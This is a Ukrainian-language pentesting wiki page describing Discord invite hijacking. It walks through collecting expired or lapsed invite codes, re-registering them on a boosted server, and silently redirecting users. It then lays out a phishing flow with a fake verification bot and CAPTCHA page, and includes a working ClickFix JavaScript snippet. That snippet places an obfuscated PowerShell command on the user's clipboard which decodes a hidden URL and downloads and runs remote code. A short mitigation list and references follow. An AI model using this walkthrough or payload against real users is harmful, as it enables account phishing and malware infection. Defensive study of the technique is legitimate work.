Discord Invite Hijacking

Вразливість системи запрошень Discord дозволяє зловмисникам отримувати доступ до застарілих або видалених кодів запрошень (тимчасових, постійних або кастомних) як нових посилань на будь-якому сервері з підвищенням рівня 3. Нормалізуючи всі коди до нижнього регістру, зловмисники можуть попередньо зареєструвати відомі коди запрошень і тихо перехоплювати трафік, як тільки оригінальне посилання закінчує термін дії або сервер-джерело втрачає своє підвищення.

Типи запрошень та ризик перехоплення

Тип запрошення	Можна перехопити?	Умови / Коментарі
Тимчасове посилання	✅	Після закінчення терміну дії код стає доступним і може бути повторно зареєстрований як кастомне URL на підвищеному сервері.
Постійне посилання	⚠️	Якщо видалено і складається лише з малих літер та цифр, код може знову стати доступним.
Кастомне посилання	✅	Якщо оригінальний сервер втрачає своє підвищення рівня 3, його кастомне запрошення стає доступним для нової реєстрації.

Кроки експлуатації

Розвідка

Моніторинг публічних джерел (форумів, соціальних мереж, каналів Telegram) на наявність посилань на запрошення, що відповідають шаблону discord.gg/{code} або discord.com/invite/{code}.
Збір кодів запрошень, що вас цікавлять (тимчасових або кастомних).

Попередня реєстрація

Створіть або використовуйте існуючий сервер Discord з привілеями підвищення рівня 3.
У Налаштуваннях сервера → Кастомне URL, спробуйте призначити цільовий код запрошення. Якщо прийнято, код резервується зловмисним сервером.

Активація перехоплення

Для тимчасових запрошень чекайте, поки оригінальне запрошення не закінчить термін дії (або видаліть його вручну, якщо ви контролюєте джерело).
Для кодів, що містять великі літери, варіант з малими літерами можна отримати негайно, хоча перенаправлення активується лише після закінчення терміну дії.

Тихе перенаправлення

Користувачі, які відвідують старе посилання, безперешкодно перенаправляються на сервер, контрольований зловмисником, як тільки перехоплення активується.

Потік фішингу через сервер Discord

Обмежте канали сервера так, щоб лише канал #verify був видимим.
Розгорніть бота (наприклад, Safeguard#0786), щоб запропонувати новачкам підтвердити свою особу через OAuth2.
Бот перенаправляє користувачів на фішинговий сайт (наприклад, captchaguard.me) під виглядом CAPTCHA або етапу перевірки.
Реалізуйте трюк UX ClickFix:

Відобразіть повідомлення про зламану CAPTCHA.
Скажіть користувачам відкрити діалог Win+R, вставити попередньо завантажену команду PowerShell і натиснути Enter.

Приклад ін'єкції в буфер обміну ClickFix

// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);

Цей підхід уникає прямих завантажень файлів і використовує знайомі елементи інтерфейсу, щоб знизити підозру користувачів.

Заходи пом'якшення

Використовуйте постійні посилання на запрошення, що містять принаймні одну велику літеру або неалфавітний символ (ніколи не закінчуються, не підлягають повторному використанню).
Регулярно змінюйте коди запрошень і відкликайте старі посилання.
Моніторте статус підвищення сервера Discord і заяви про унікальні URL.
Навчайте користувачів перевіряти автентичність сервера та уникати виконання команд, вставлених з буфера обміну.

Посилання

From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link

6.9 KiB Raw Blame History Unescape Escape